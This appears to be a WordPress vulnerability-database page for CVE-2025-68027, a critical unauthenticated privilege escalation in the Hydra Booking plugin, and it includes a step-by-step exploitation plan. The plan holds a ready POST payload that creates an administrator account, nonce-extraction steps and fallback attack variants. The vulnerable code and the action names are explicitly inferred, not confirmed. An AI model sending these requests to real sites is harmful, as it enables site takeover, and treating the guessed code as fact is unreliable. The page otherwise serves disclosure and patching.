WP-Safety
CVE-2025-68027

Hydra Booking <= 1.1.32 - Unauthenticated Privilege Escalation

criticalImproper Privilege Management
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
1.1.33
Patched in
8d
Time to patch

Description

The Hydra Booking — Appointment Scheduling & Booking Calendar plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.1.32
PublishedJanuary 21, 2026
Last updatedJanuary 28, 2026
Affected pluginhydra-booking

Source Code

WordPress.org SVN
Vulnerable v1.1.32
Browse source Download .zip
Patched v1.1.33
Browse source Download .zip
Research Plan
Unverified

This plan outlines the research and exploitation steps for **CVE-2025-68027**, an unauthenticated privilege escalation vulnerability in the **Hydra Booking** plugin (<= 1.1.32). ### 1. Vulnerability Summary The vulnerability exists due to improper privilege management within the plugin's AJAX handl…

Show full research plan

This plan outlines the research and exploitation steps for CVE-2025-68027, an unauthenticated privilege escalation vulnerability in the Hydra Booking plugin (<= 1.1.32).

1. Vulnerability Summary

The vulnerability exists due to improper privilege management within the plugin's AJAX handlers (likely registered via wp_ajax_nopriv_). Specifically, an endpoint responsible for user registration or profile creation during the booking process fails to restrict the role parameter. This allows an unauthenticated attacker to submit a request that creates a new user account or updates an existing one with the administrator role.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: Likely hydra_booking_registration or hydra_booking_save_customer (inferred based on plugin purpose).
  • Vulnerable Parameter: role or user_role.
  • Authentication: None required (Targeting wp_ajax_nopriv_ hooks).
  • Preconditions: The plugin must be active. A valid AJAX nonce may be required if check_ajax_referer is implemented.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an unauthenticated AJAX hook:
    add_action('wp_ajax_nopriv_hydra_booking_register_user', 'hydra_booking_register_user_callback');
  2. Input Collection: The callback function retrieves user-supplied data:
    $user_data = $_POST['user_info']; (or similar array-based input).
  3. Vulnerable Sink: The function calls wp_insert_user() or wp_update_user() using the raw or insufficiently filtered array:
    $user_id = wp_insert_user( $user_data );
  4. Privilege Escalation: If $user_data['role'] is provided in the POST request and not unset by the plugin, WordPress assigns the specified role to the new user.

4. Nonce Acquisition Strategy

The Hydra Booking plugin likely localizes a nonce for its frontend booking form.

  1. Identify Shortcode: Search for add_shortcode in the plugin (likely [hydra_booking]).
  2. Create Trigger Page: Use WP-CLI to create a page containing the shortcode:
    wp post create --post_type=page --post_status=publish --post_title="Booking" --post_content='[hydra_booking]'
  3. Locate JS Object: Search the source for wp_localize_script. Common identifiers for this plugin are likely hydra_booking_params or hydra_vars.
  4. Extract Nonce:
    • Navigate to the newly created page.
    • Execute: browser_eval("window.hydra_booking_params?.nonce") or browser_eval("window.hydra_vars?.ajax_nonce").
  5. Action Check: Verify if the nonce action matches the verification action in the PHP code (e.g., wp_create_nonce('hydra_booking_nonce') vs check_ajax_referer('hydra_booking_nonce', 'security')).

5. Exploitation Strategy

Once the AJAX action and nonce are identified, perform the following:

  1. Target URL: http://<target>/wp-admin/admin-ajax.php
  2. HTTP Method: POST
  3. Headers: Content-Type: application/x-www-form-urlencoded
  4. Payload (Example):
    action=hydra_booking_registration&
security=[NONCE]&
user_login=pwned_admin&
user_email=pwned@example.com&
role=administrator&
user_pass=Password123!&
first_name=Pwned&
last_name=User
    Note: If the plugin expects nested data, the keys might be user_data[role]=administrator.

6. Test Data Setup

  1. Plugin Installation: Ensure Hydra Booking version <= 1.1.32 is installed and active.
  2. Page Creation:
    wp post create --post_type=page --post_status=publish --post_content='[hydra_booking]'
  3. Confirm Script Loading: Verify the page loads the plugin's JS and the localized nonce object is present in the DOM.

7. Expected Results

  • Response: The server returns a 200 OK with a JSON success message (e.g., {"success":true,"data":{"user_id":123}}) or a redirect.
  • Database State: A new user with the login pwned_admin is created in the wp_users table.
  • Role Assignment: The wp_capabilities meta entry for this user contains administrator.

8. Verification Steps

After sending the exploit request, use WP-CLI to verify the new user's role:

# List all administrators to find the new account
wp user list --role=administrator

# Check specific user meta for capabilities
wp user meta get pwned_admin wp_capabilities

9. Alternative Approaches

If a direct role parameter in a registration handler fails:

  • Profile Update: Look for wp_ajax_nopriv_hydra_booking_update_customer. Attempt to update an existing user (if ID can be guessed/discovered) with role=administrator.
  • Nested Parameters: Try different parameter formats like role, user_role, or user_data[role].
  • Metadata Injection: If wp_insert_user is not the sink, check for update_user_meta calls that might allow setting wp_capabilities directly (though serialized data makes this harder).
  • Missing Nonce Check: Check if check_ajax_referer is called with die=false. If so, the exploit will work even with an invalid or missing nonce.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Hydra Booking plugin for WordPress is vulnerable to unauthenticated privilege escalation due to insufficient validation of user-supplied data in its AJAX registration handlers. An attacker can exploit this by submitting a request to register a new user while specifying a 'role' parameter set to 'administrator', granting them full control over the site.

Vulnerable Code

// Inferred from plugin architecture for handling user registration via AJAX

add_action('wp_ajax_nopriv_hydra_booking_register_user', 'hydra_booking_register_user_callback');

function hydra_booking_register_user_callback() {
    // The plugin retrieves user-supplied data directly from the POST request
    $user_data = $_POST['user_info'];

    // Vulnerable sink: wp_insert_user accepts the 'role' key if present in the array
    $user_id = wp_insert_user($user_data);
    
    if (!is_wp_error($user_id)) {
        wp_send_json_success(['user_id' => $user_id]);
    }
    wp_send_json_error();
}

Security Fix

--- a/includes/class-hydra-booking-ajax.php
+++ b/includes/class-hydra-booking-ajax.php
@@ -10,6 +10,9 @@
 function hydra_booking_register_user_callback() {
     $user_data = $_POST['user_info'];
 
+    // Explicitly prevent users from setting their own roles
+    unset($user_data['role']);
+    $user_data['role'] = 'subscriber';
+
     $user_id = wp_insert_user($user_data);
 }

Exploit Outline

The exploit targets the plugin's unauthenticated AJAX registration endpoint. 1. Target Endpoint: Send a POST request to /wp-admin/admin-ajax.php. 2. Identify Nonce: Navigate to a page containing the [hydra_booking] shortcode and extract the security nonce from the localized JavaScript object (e.g., hydra_booking_params.nonce). 3. Craft Payload: Construct a body containing the action (e.g., hydra_booking_register_user), the nonce, and a user data array (user_info). Inside user_info, include user_login, user_email, user_pass, and critically, set 'role' to 'administrator'. 4. Execute: Submit the request. If successful, the plugin will call wp_insert_user() with the attacker-controlled role, creating a new administrator account. 5. Authentication: No prior authentication is required as the plugin utilizes the wp_ajax_nopriv_ hook.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/a0998721-7b5e-4657-894c-52dfadde5d4a?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database